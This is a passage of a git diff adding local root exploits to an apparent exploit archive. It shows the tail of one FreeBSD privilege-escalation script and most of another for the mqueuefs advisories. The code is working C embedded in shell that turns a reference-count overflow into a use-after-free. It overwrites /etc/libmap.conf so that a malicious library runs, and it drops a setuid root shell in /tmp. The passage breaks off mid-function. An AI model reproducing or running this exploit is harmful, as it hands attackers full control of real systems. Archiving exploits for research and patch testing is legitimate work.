+	    pthread_cond_signal(&trigger_cond);		    
+	    printf("[+] monitor: Reached hidirtybuffers watermark\n");
+	    break;
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+int check_write(int fd) {
+    char buf[256];
+    int nbytes;
+    struct stat st;
+
+    printf("[+] check_write\n");
+    stat(DEFAULT_PATH, &st);
+    printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
+
+    stat(ATTACK_PATH, &st);
+    printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
+        
+    nbytes = read(fd, buf, strlen(HOOK_LIB));
+    printf("[+] Read bytes: %d\n", nbytes);
+    if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
+	return 1;
+    }
+    else if (nbytes < 0) {
+	perror("[!] check_write:read");
+	printf("[!] check_write:Cannot check if it worked!");
+	return 1;
+    }
+    
+    return 0;
+}
+
+void *write_to_file(void *thread_args) {
+    int fd, fd2, nbytes;
+    int *fd_ptr;
+    char buf[256];
+    struct thread_data *thread_data;
+
+    if (stick_thread_to_core(CORE_1) != 0) {
+	perror("[!] write_to_file: Could not stick thread to core");
+    }
+    
+    fd_ptr = (int *) malloc(sizeof(int));
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = open(ATTACK_PATH, O_RDONLY);
+
+    printf("[+] write_to_file: Wait for signal from monitor\n");	
+    pthread_mutex_lock(&write_mtx);
+    pthread_cond_wait(&write_cond, &write_mtx);
+
+    snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
+    nbytes = write(fd, buf, strlen(buf));
+
+    // Reopen directly after write to prevent panic later
+    //
+    // After the write f_count == 0 because after trigger_uaf()
+    // opened the read-only file, f_count == 1 and write()
+    // calls fdrop() at the end
+    //
+    // => f_count == 0
+    //
+    // A direct open hopefully assigns the now again free file
+    // object to fd so that we can prevent the panic with our
+    // increment primitive.
+    if ((fd = open_tmp(NULL)) == -1)
+	perror("[!] write_to_file: open_tmp");
+    *fd_ptr = fd;
+    
+    if (nbytes < 0) {
+	perror("[!] [!] write_to_file:write");
+    } else if (nbytes > 0) {
+	printf("[+] write_to_file: We have written something...\n");
+	if (check_write(fd2) > 0)
+	    printf("[+] write_to_file: It (probably) worked!\n");
+	else
+	    printf("[!] write_to_file: It worked not :(\n");
+    }
+
+    printf("[+] write_to_file: Exit\n");
+    pthread_exit(fd_ptr);
+}
+
+void prepare(int sv[2], int fds[2]) {
+    int fd, fd2, i;
+
+    printf("[+] Start UaF preparation\n");
+    printf("[+] This can take a while\n");
+	
+    // Get a single file descriptor to send via the socket
+    if ((fd = open_tmp(NULL)) == -1) {
+    	perror("[!] open_tmp");
+    	exit(1);
+    }
+    
+    if ((fd2 = dup(fd)) == -1) {
+	perror("[!] dup");
+	exit(1);
+    }
+    
+    // fp->f_count will increment by 0xfe in one iteration
+    // doing this 16909320 times will lead to
+    // f_count = 16909320 * 0xfe + 2 = 0xfffffff2
+    // Note the 2 because of the former call of dup() and
+    // the first open().
+    //
+    // To test our trigger we can send 0xd more fd's what
+    // would to an f_count of 0 when fdclose() is called in
+    // m_dispose_extcontrolm. fdrop() will reduce f_count to
+    // 0xffffffff = -1 and ultimately panic when _fdrop() is
+    // called because the latter asserts that f_count is 0.
+    // _fdrop is called in the first place because
+    // refcount_release() only checks that f_count is less or
+    // equal 1 to recognize the last reference.
+    //
+    // If we want to trigger the free without panic, we have
+    // to send 0xf fds and close an own what will lead to an
+    // fdrop() call without panic as f_count is 1 and reduced
+    // to 0 by close(). The unclosed descriptor references now
+    // a free 'struct file'.
+    for (i = 0; i < 16909320; i++) {
+    	if (i % 1690930 == 0) {
+    	    printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
+    	}
+	
+        if (send_recv(fd, sv, N_FDS)) {
+    	    perror("[!] prepare:send_recv");
+    	    exit(1);
+    	}
+    }
+    if (send_recv(fd, sv, 0xf)) {
+    	perror("[!] prepare:send_recv");
+    	exit(1);
+    }
+    
+    fds[0] = fd;
+    fds[1] = fd2;
+
+    printf("[+] Finished UaF preparation\n");
+}
+
+void read_thread_status(int server_socket) {
+    int bytes_rec, count;
+    struct sockaddr_un client;
+    socklen_t len;
+    char buf[256];
+    struct timeval tv;
+    
+    tv.tv_sec = 10;
+    tv.tv_usec = 0;
+    setsockopt(server_socket,
+	       SOL_SOCKET, SO_RCVTIMEO,
+	       (const char*)&tv, sizeof tv);
+    
+    for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
+	if (count % 100 == 0) {
+	    printf("[+] Hammer threads ready: %d\n", count);
+	}
+	bzero(&client, sizeof(struct sockaddr_un));
+	bzero(buf, 256);
+	
+	len = sizeof(struct sockaddr_un);
+	if ((bytes_rec = recvfrom(server_socket,
+				  buf, 256, 0,
+				  (struct sockaddr *) &client,
+				  &len)) == -1) {
+	    perror("[!] recvfrom");
+	    break;
+	}
+    }
+
+    if (count != NUM_FORKS * NUM_THREADS) {
+	printf("[!] Could not create all hammer threads, will try though!\n");
+    }
+}
+
+void fire() {
+    int i, j, fd, fd2, bytes_rec, server_socket;
+    int sv[2], fds[2], hammer_socket[NUM_FORKS];
+    int *fd_ptr;
+    char socket_path[256], sync_buf[3], buf[256];
+    pthread_t write_thread, trigger_thread, monitor_thread;
+    pthread_t hammer_threads[NUM_THREADS];
+    pid_t pids[NUM_FORKS];
+    socklen_t len;
+    struct thread_data thread_data;
+    struct sockaddr_un server, client;
+    struct sockaddr_un hammer_socket_addr[NUM_FORKS];
+
+    // Socket for receiving thread status
+    unlink(SERVER_PATH);
+    prepare_domain_socket(&server, SERVER_PATH);
+    server_socket = bind_domain_socket(&server);
+
+    // Sockets to receive hammer signal
+    for (i = 0; i < NUM_FORKS; i++) {
+	snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
+	unlink(socket_path);
+	prepare_domain_socket(&hammer_socket_addr[i], socket_path);
+	hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
+    }
+
+    strncpy(sync_buf, "1\n", 3);
+    len = sizeof(struct sockaddr_un);
+    
+    if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
+	perror("[!] socketpair");
+	exit(1);
+    }
+        
+    pthread_mutex_init(&write_mtx, NULL);
+    pthread_mutex_init(&trigger_mtx, NULL);
+    pthread_cond_init(&write_cond, NULL);
+    pthread_cond_init(&trigger_cond, NULL);
+
+    pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
+
+    prepare(sv, fds);
+    fd = fds[0];
+    fd2 = fds[1];
+
+    thread_data.fd = fd;
+    thread_data.fd2 = fd2;
+    pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
+    pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
+    
+    for (j = 0; j < NUM_FORKS; j++) {
+	if ((pids[j] = fork()) < 0) {
+	    perror("[!] fork");
+	    abort();
+	}
+	else if (pids[j] == 0) {
+	    pthread_mutex_init(&hammer_mtx, NULL);
+	    pthread_cond_init(&hammer_cond, NULL);
+	    
+	    close(fd);
+	    close(fd2);
+
+	    /* Prevent that a file stream in the hammer threads
+             * gets the file descriptor of fd for debugging purposes
+	     */
+	    if ((fd = open_tmp("/tmp/dummy")) == -1)
+		perror("[!] dummy");
+	    if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
+		perror("[!] dummy2");
+	    printf("[+] Fork %d fd: %d\n", j, fd);
+	    printf("[+] Fork %d fd2: %d\n", j, fd2);
+	    
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_create(&hammer_threads[i], NULL, hammer, NULL);
+	    }
+
+	    printf("[+] Fork %d created all threads\n", j);
+	    
+	    if ((bytes_rec = recvfrom(hammer_socket[j],
+				      buf, 256, 0,
+				      (struct sockaddr *) &client,
+				      &len)) == -1) {
+		perror("[!] accept");
+		abort();
+	    }
+
+	    pthread_cond_broadcast(&hammer_cond);
+	    
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_join(hammer_threads[i], NULL);
+	    }
+
+	    pthread_cond_destroy(&hammer_cond);
+	    pthread_mutex_destroy(&hammer_mtx);
+
+	    exit(0);
+	} else {
+	    printf("[+] Created child with PID %d\n", pids[j]);	    
+	}
+    }    
+
+    read_thread_status(server_socket);
+    printf("[+] Send signal to Start Hammering\n");
+    for (i = 0; i < NUM_FORKS; i++) {
+	if (sendto(hammer_socket[i],
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &hammer_socket_addr[i],
+		   sizeof(hammer_socket_addr[0])) == -1) {
+	    perror("[!] sendto");
+	    exit(1);
+	}
+    }
+        
+    pthread_join(monitor_thread, NULL);
+    for (i = 0; i < NUM_FORKS; i++) {
+	kill(pids[i], SIGKILL);
+	printf("[+] Killed %d\n", pids[i]);
+    }
+
+    pthread_join(write_thread, (void **) &fd_ptr);    
+    pthread_join(trigger_thread, NULL);
+    
+    pthread_mutex_destroy(&write_mtx);
+    pthread_mutex_destroy(&trigger_mtx);
+    pthread_cond_destroy(&write_cond);
+    pthread_cond_destroy(&trigger_cond);
+
+    printf("[+] Returned fd: %d\n", *fd_ptr);
+    prevent_panic(sv, *fd_ptr);
+
+    // fd was acquired from write_to_file
+    // which allocs a pointer for it
+    free(fd_ptr);
+}
+
+int main(int argc, char **argv)
+{
+    setbuf(stdout, NULL);
+    
+    fire();
+
+    return 0;
+}
+
+EOF
+
+cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
+
+cat > program.c << EOF
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init()
+{
+  if (!geteuid())
+    execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
+}
+
+EOF
+
+cc -o program.o -c program.c -fPIC
+cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
+cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
+
+echo "[+] Firing the Heavy Cyber Weapon"
+./heavy_cyber_weapon
+su
+
+if [ -f /tmp/xxxx ]; then
+    echo "[+] Enjoy!"
+    echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
+    /tmp/xxxx
+else
+    echo "[!] FAIL"
+fi
\ No newline at end of file
diff --git a/exploits/freebsd/local/47830.sh b/exploits/freebsd/local/47830.sh
new file mode 100755
index 000000000..98d9761e6
--- /dev/null
+++ b/exploits/freebsd/local/47830.sh
@@ -0,0 +1,754 @@
+# Exploit: FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
+# Author: Karsten König of Secfault Security
+# Date: 2019-12-30
+# Change line 719 to choose which vulnerability
+# is targeted
+#
+# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
+# Exploit for FreeBSD-SA-19:15.mqueuefs and
+# FreeBSD-SA-19:24.mqueu
+#!/bin/sh
+
+echo "[+] Root Exploit for FreeBSD mqueuefs vulnerabilities"
+
+umask 0000
+
+# libmap.conf has to exist because it is
+# the attacked file
+if [ ! -f /etc/libmap.conf ]; then
+    echo "[!] libmap.conf has to exist"
+    exit
+fi
+
+# Make a backup of the current libmap.conf
+# because it has to be reconstructed afterwards
+cp /etc/libmap.conf ./
+
+# Write the exploit to a C file
+cat > exploit.c << EOF
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <pthread_np.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/cpuset.h>
+#include <sys/event.h>
+#include <sys/ioctl.h>
+#include <sys/param.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/sysctl.h>
+#include <sys/_types.h>
+#include <sys/types.h>
+#include <sys/un.h>
+
+#define N_OPEN 0x2
+
+// Tweak NUM_THREADS and NUM_FORKS if
+// more RAM is available on the target
+//
+// These parameters were tested with
+// up to 16 GB of RAM on a dual-core
+// Intel based system
+#define N 1000000
+#define NUM_THREADS 600
+#define NUM_FORKS 3
+#define FILE_SIZE 1024
+#define CHUNK_SIZE 1
+#define N_FILES 25
+
+// These are temporary files
+// which are created during
+// exploitation
+#define SERVER_PATH "/tmp/sync_forks"
+#define DEFAULT_PATH "/tmp/pwn"
+#define HAMMER_PATH "/tmp/pwn2"
+
+// This is the attacked file
+#define ATTACK_PATH "/etc/libmap.conf"
+
+// These are parameters from the attack script
+#define HOOK_LIB "libutil.so.9"
+#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
+
+// The exploit will stick some threads
+// to specific cores
+#define CORE_0 0
+#define CORE_1 1
+
+// Syscalls from mqueuefs
+#define KMQ_OPEN 457
+#define KMQ_TIMEDSEND 460
+
+// Taken from sys/mqueue.h
+struct mq_attr {
+    long    mq_flags;
+    long    mq_maxmsg;
+    long    mq_msgsize;
+    long    mq_curmsgs;
+    long    __reserved[4];
+};
+
+struct thread_data {
+    int fd;
+    int fd2;
+};
+
+pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
+pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
+
+// Both syscalls are indirectly called to be less reliable on
+// installed libraries
+int mq_open(const char *name, int oflag, mode_t mode,
+            const struct mq_attr *attr)
+{
+    int fd;
+    fd = syscall(KMQ_OPEN, name, oflag, mode, attr);
+    return fd;
+}
+
+void mq_timedsend(int fd, char *buf, size_t len,
+		 unsigned prio, const struct timespec *timeout)
+{
+    syscall(KMQ_TIMEDSEND, fd, buf, len, prio, timeout);
+}
+
+// Convenience function to open temporary files
+int open_tmp(char *path)
+{
+    int fd;
+    char *real_path;
+
+    if (path != NULL) {
+	real_path = malloc(strlen(path) + 1);
+	strcpy(real_path, path);
+    }
+    else {
+	real_path = malloc(strlen(DEFAULT_PATH) + 1);
+	strcpy(real_path, DEFAULT_PATH);
+    }
+
+    if ((fd = open(real_path, O_RDWR | O_CREAT, S_IRWXU)) == -1) {
+	perror("[!] open");
+    }
+    
+    return fd;
+}
+
+// Convenience function to prepare a UNIX domain socket
+void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
+    bzero(remote, sizeof(struct sockaddr_un));
+    remote->sun_family = AF_UNIX;
+    strncpy(remote->sun_path, path, sizeof(remote->sun_path));
+}
+
+// Convenience function to bind a UNIX domain socket
+int bind_domain_socket(struct sockaddr_un *remote) {
+    int server_socket;
+    
+    if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    if (bind(server_socket, 
+	     (struct sockaddr *) remote, 
+	     sizeof(struct sockaddr_un)) != 0) {
+	perror("[!] bind");
+	exit(1);
+    }
+
+    return server_socket;
+}
+
+// Convenience function to connect to a UNIX domain socket
+int connect_domain_socket_client() {
+    int client_socket;
+    
+    if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    return client_socket;
+}
+
+// Prevent panic at termination because f_count of the
+// corrupted struct file is 0 at the moment this function
+// is called but open file descriptors still points to the struct,
+// hence fdrop() is called at exit of the program and will raise a
+// kernel panic because f_count will be below 0
+//
+// So we just use our known primitive to increase f_count
+void prevent_panic(int fd)
+{
+    mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
+    mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
+    mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
+}
+
+// Convenience function to stick a thread to a CPU core
+int stick_thread_to_core(int core) {
+    cpuset_t cpuset;
+    CPU_ZERO(&cpuset);
+    CPU_SET(core, &cpuset);
+    
+    pthread_t current_thread = pthread_self();    
+    return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
+}
+
+// This function will trigger the use-after-free
+void *trigger_uaf(void *thread_args) {
+    struct thread_data *thread_data;
+    int fd, fd2;
+
+    if (stick_thread_to_core(CORE_0) != 0) {
+	perror("[!] [!] trigger_uaf: Could not stick thread to core");
+    }
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = thread_data->fd2;
+
+    printf("[+] trigger_uaf: fd: %d\n", fd);
+    printf("[+] trigger_uaf: fd2: %d\n", fd2);
+
+    // The thread has to wait for the preparation of the
+    // race condition
+    printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
+    pthread_mutex_lock(&trigger_mtx);
+    pthread_cond_wait(&trigger_cond, &trigger_mtx);
+
+    // This sleep parameter helps to render
+    // the exploit more reliable
+    //
+    // Tweeking may be needed for the target system
+    usleep(40);
+
+    // Close two fds to trigger UaF
+    //
+    // This assumes that fget_write() in kern_writev()
+    // was already successful!
+    //
+    // Otherwise kernel panic is triggered
+    //
+    // f_count = 2 (primitive+fget_write)
+    close(fd);
+    close(fd2);
+    // f_count = 0 => free
+    fd = open(ATTACK_PATH, O_RDONLY);
+    // refcount = 1
+    // all fds do now point to the attacked path
+
+    printf("[+] trigger_uaf: Opened read-only file\n");	
+    printf("[+] trigger_uaf: Exit\n");
+    
+    pthread_exit(NULL);
+}
+
+// This function will write to many invalid file streams
+//
+// This will eventually increase the number of dirty buffers
+// in the kernel and creates an exploitable race condition
+// for the Use-after-Free
+void *hammer(void *arg) {
+    int i, j, k, client_socket;
+    char buf[FILE_SIZE], sync_buf[3];
+    FILE *fd[N_FILES];
+    struct sockaddr_un remote;
+
+    prepare_domain_socket(&remote, SERVER_PATH);
+    client_socket = connect_domain_socket_client();
+    strncpy(sync_buf, "1\n", 3);
+
+    // Open many files and unlink them directly
+    // to render the file stream invalid
+    for (i = 0; i < N_FILES; i++) {
+	unlink(HAMMER_PATH);
+	if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
+	    perror("[!] fopen");
+	    exit(1);
+	}
+    }
+    
+    for (i = 0; i < FILE_SIZE; i++) {
+    	buf[i] = 'a';
+    }
+
+    pthread_mutex_lock(&hammer_mtx);
+
+    // Signal that the thread is prepared
+    // 
+    // Sometimes sendto() fails because
+    // no free buffer is available
+    for (;;) {
+	if (sendto(client_socket,
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &remote,
+		   sizeof(remote)) != -1) {
+	    break;
+	}
+    }
+    
+    // Wait for the other hammer threads
+    pthread_cond_wait(&hammer_cond, &hammer_mtx);
+    pthread_mutex_unlock(&hammer_mtx);
+
+    // Write to the file streams to create many dirty buffers
+    for (i = 0; i < N; i++) {
+	for (k = 0; k < N_FILES; k++) {
+	    rewind(fd[k]);   
+	}
+	for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
+	    for (k = 0; k < N_FILES; k++) {
+		if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
+		    perror("[!] fwrite");
+		    exit(1);
+		}
+	    }
+	    fflush(NULL);
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+// This function monitors the number of
+// dirty buffers.
+//
+// If enough dirty buffers do exist, a
+// signal to the write and Use-after-Free
+// trigger thread is signalled to
+// execute the actual attack
+//
+// Works on UFS only
+void *monitor_dirty_buffers(void *arg) {
+    int hidirtybuffers, numdirtybuffers;
+    size_t len;
+
+    len = sizeof(int);
+    
+    if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
+	perror("[!] sysctlbyname hidirtybuffers");
+	exit(1);
+    };
+    printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
+
+    while(1) {
+	sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
+	if (numdirtybuffers >= hidirtybuffers) {
+	    pthread_cond_signal(&write_cond);
+	    pthread_cond_signal(&trigger_cond);		    
+	    printf("[+] monitor: Reached hidirtybuffers watermark\n");
+	    break;
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+// Check if the write to the attacked
+// path was successful
+int check_write(int fd) {
+    char buf[256];
+    int nbytes;
+    struct stat st;
+
+    printf("[+] check_write\n");
+    stat(DEFAULT_PATH, &st);
+    printf("[+] %s size: %lld\n", DEFAULT_PATH, st.st_size);
+
+    stat(ATTACK_PATH, &st);
+    printf("[+] %s size: %lld\n", ATTACK_PATH, st.st_size);
+        
+    nbytes = read(fd, buf, strlen(HOOK_LIB));
+    printf("[+] Read bytes: %d\n", nbytes);
+    if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
+	return 1;
+    }
+    else if (nbytes < 0) {
+	perror("[!] check_write:read");
+	printf("[!] check_write:Cannot check if it worked!");
+	return 1;
+    }
+    
+    return 0;
+}
+
+// This function will execute the write operation
+// to the attacked path
+void *write_to_file(void *thread_args) {
+    int fd, fd2, nbytes;
+    int *fd_ptr;
+    char buf[256];
+    struct thread_data *thread_data;
+    struct mq_attr attrs;
+    
+    if (stick_thread_to_core(CORE_1) != 0) {
+	perror("[!] write_to_file: Could not stick thread to core");
+    }
+
+    fd_ptr = malloc(sizeof(int));
+    
+    attrs.mq_maxmsg = 10;
+    attrs.mq_msgsize = sizeof(int);    
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = open(ATTACK_PATH, O_RDONLY);
+
+    // Wait for the signal to execute the write operation
+    printf("[+] write_to_file: Wait for signal from monitor\n");	
+    pthread_mutex_lock(&write_mtx);
+    pthread_cond_wait(&write_cond, &write_mtx);
+
+    // Write to the temporary file
+    //
+    // During the write operation the exploit will trigger
+    // the Use-after-Free and exchange the written file
+    // with the attacked file to render a write to it
+    snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
+    nbytes = write(fd, buf, strlen(buf));
+
+    // Reopen directly after write to prevent panic later
+    //
+    // After the write f_count == 0 because after trigger_uaf()
+    // opened the read-only file, f_count == 1 and write()
+    // calls fdrop() at the end
+    //
+    // => f_count == 0
+    //
+    // A direct open hopefully assigns the now again free file
+    // object to fd so that we can prevent the panic with our
+    // increment primitive.
+    *fd_ptr = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
+    if (*fd_ptr == -1)
+	perror("[!] write_to_file: mq_open");
+    
+    if (nbytes < 0) {
+	perror("[!] write_to_file: write");
+    } else if (nbytes > 0) {
+	printf("[+] write_to_file: We have written something...\n");
+	if (check_write(fd2) > 0)
+	    printf("[+] write_to_file: It (probably) worked!\n");
+	else
+	    printf("[!] write_to_file: It worked not :(\n");
+    }
+
+    printf("[+] write_to_file: Exit\n");
+    pthread_exit(fd_ptr);
+}
+
+// This function prepares the Use-after-Free due to
+// a reference counter overflow
+void prepare(int fds[3]) {
+    int fd, fd2, fd3, trigger_fd;
+    u_int32_t i;
+    struct mq_attr attrs;
+    attrs.mq_maxmsg = 10;
+    attrs.mq_msgsize = sizeof(int);
+
+    printf("[+] Start UaF preparation\n");
+    printf("[+] This can take a while\n");
+
+    // Open a mqueue file
+    fd = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
+    if (fd == -1) {
+	perror("open");
+	exit(1);
+    }  
+
+    // fp->f_count will be incremented by 1 per iteration due
+    // to the bug in freebsd32_kmq_timedsend()
+    //
+    // That is, 0xfffffffe iterations will increment it to
+    // 0xffffffff (f_count starts with 1 because of mq_open())
+    //
+    // The bug is triggered because freebsd_kqm_timedsend will eventually
+    // try to call copyin() with the pointer to address 0x1 which
+    // is invalid
+    for (i = 0; i < 0xfffffffe; i++) {
+    	// just a progress message, nothing special about the magic values
+    	if (i % 0x19999990 == 0)
+    	    printf("[+] Progress: %d%%\n", (u_int32_t) (i / 0x28f5c28));
+    	mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
+    }
+
+    // Every dup() increases fp->f_count by 1
+    //
+    // Using dup() works because FreeBSD's mqueue implementation
+    // is implemented by using file objects (struct file) internally.
+    //
+    // This circumvents an infinite loop in fget_unlocked() as dup()
+    // does not use _fget() but fhold() to increase the counter.
+    fd2 = dup(fd);
+    if (fd2 == -1) {
+	perror("dup");
+	exit(1);
+    }  
+    fd3 = dup(fd);
+    if (fd3 == -1) {
+	perror("dup");
+	exit(1);
+    }  
+
+    // Close the mqueue file to trigger a free operation
+    //
+    // The descriptors fd2 and fd3 will still point
+    // to the freed object
+    //
+    // Opening another file will render these descriptors
+    // to point the newly opened file
+    close(fd);
+    trigger_fd = open_tmp(NULL);
+    
+    fds[0] = trigger_fd;
+    fds[1] = fd2;
+    fds[2] = fd3;
+    
+    printf("[+] Finished UaF preparation\n");
+}
+
+// This function will monitor that all
+// hammer threads are opened
+void read_thread_status(int server_socket) {
+    int bytes_rec, count;
+    struct sockaddr_un client;
+    socklen_t len;
+    char buf[256];
+    struct timeval tv;
+    
+    tv.tv_sec = 10;
+    tv.tv_usec = 0;
+    setsockopt(server_socket,
+	       SOL_SOCKET, SO_RCVTIMEO,
+	       (const char*)&tv, sizeof tv);
+    
+    for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
+	if (count % 100 == 0) {
+	    printf("[+] Hammer threads ready: %d\n", count);
+	}
+	bzero(&client, sizeof(struct sockaddr_un));
+	bzero(buf, 256);
+	
+	len = sizeof(struct sockaddr_un);
+	if ((bytes_rec = recvfrom(server_socket,
+				  buf, 256, 0,
+				  (struct sockaddr *) &client,
+				  &len)) == -1) {
+	    perror("[!] recvfrom");
+	    break;
+	}
+    }
+
+    if (count != NUM_FORKS * NUM_THREADS) {
+	printf("[!] Could not create all hammer threads, will try though!\n");
+    }
+}
+
+// This function will execute the whole exploit
+void fire() {
+    int i, j, fd, fd2, fd3, bytes_rec, server_socket;
+    int sv[2], fds[3], hammer_socket[NUM_FORKS];
+    int *fd_ptr;
+    char socket_path[256], sync_buf[3], buf[256];
+    pthread_t write_thread, trigger_thread, monitor_thread;
+    pthread_t hammer_threads[NUM_THREADS];
+    pid_t pids[NUM_FORKS];
+    socklen_t len;
+    struct thread_data thread_data;
+    struct sockaddr_un server, client;
+    struct sockaddr_un hammer_socket_addr[NUM_FORKS];
+
+    // Socket for receiving thread status
+    unlink(SERVER_PATH);
+    prepare_domain_socket(&server, SERVER_PATH);
+    server_socket = bind_domain_socket(&server);
+
+    // Sockets to receive hammer signal
+    for (i = 0; i < NUM_FORKS; i++) {
+	snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
+	unlink(socket_path);
+	prepare_domain_socket(&hammer_socket_addr[i], socket_path);
+	hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
+    }
+
+    strncpy(sync_buf, "1\n", 3);
+    len = sizeof(struct sockaddr_un);
+    
+    if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
+	perror("[!] socketpair");
+	exit(1);
+    }
+        
+    pthread_mutex_init(&write_mtx, NULL);
+    pthread_mutex_init(&trigger_mtx, NULL);
+    pthread_cond_init(&write_cond, NULL);
+    pthread_cond_init(&trigger_cond, NULL);
+
+    // Create the thread to monitor the number of
+    // dirty buffers directly in the beginning
+    // to be ready when needed
+    pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
+
+    // Prepare the UaF using the 0day
+    prepare(fds);
+    fd = fds[0];
+    fd2 = fds[1];
+    fd3 = fds[2];
+
+    // Create the threads which will execute the exploit
+    thread_data.fd = fd;
+    thread_data.fd2 = fd2;
+    pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
+    pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
+    
+    for (j = 0; j < NUM_FORKS; j++) {
+	if ((pids[j] = fork()) < 0) {
+	    perror("[!] fork");
+	    abort();
+	}
+	else if (pids[j] == 0) {
+	    // Close the file descriptors
+	    // becasue each fork will have an own reference
+	    // to the file object, thus increasing the
+	    // reference counter
+	    close(fd);	    
+	    close(fd2);
+	    close(fd3);
+	    pthread_mutex_init(&hammer_mtx, NULL);
+	    pthread_cond_init(&hammer_cond, NULL);
+
+	    // Create the hammer threads
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_create(&hammer_threads[i], NULL, hammer, NULL);
+	    }
+
+	    printf("[+] Fork %d created all threads\n", j);
+
+	    // Wait for the signal to start hammering from the parent
+	    if ((bytes_rec = recvfrom(hammer_socket[j],
+				      buf, 256, 0,
+				      (struct sockaddr *) &client,
+				      &len)) == -1) {
+		perror("[!] accept");
+		abort();
+	    }
+
+	    // Broadcast to the hammer threads to
+	    // start hammering
+	    pthread_cond_broadcast(&hammer_cond);
+
+	    // Wait for the hammer threads
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_join(hammer_threads[i], NULL);
+	    }
+
+	    pthread_cond_destroy(&hammer_cond);
+	    pthread_mutex_destroy(&hammer_mtx);
+
+	    exit(0);
+	} else {
+	    printf("[+] Created child with PID %d\n", pids[j]);	    
+	}
+    }    
+
+    // Wait for the preparation of all hammer threads
+    // in the forks.
+    //
+    // If all are prepared, send a signal to the childs
+    // to start the hammering process to create dirty
+    // buffers.
+    read_thread_status(server_socket);
+    printf("[+] Send signal to Start Hammering\n");
+    for (i = 0; i < NUM_FORKS; i++) {
+	if (sendto(hammer_socket[i],
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &hammer_socket_addr[i],
+		   sizeof(hammer_socket_addr[0])) == -1) {
+	    perror("[!] sendto");
+	    exit(1);
+	}
+    }
+
+    // Wait for all threads to finish
+    pthread_join(monitor_thread, NULL);
+    for (i = 0; i < NUM_FORKS; i++) {
+	kill(pids[i], SIGKILL);
+	printf("[+] Killed %d\n", pids[i]);
+    }
+
+    pthread_join(write_thread, (void **) &fd_ptr);    
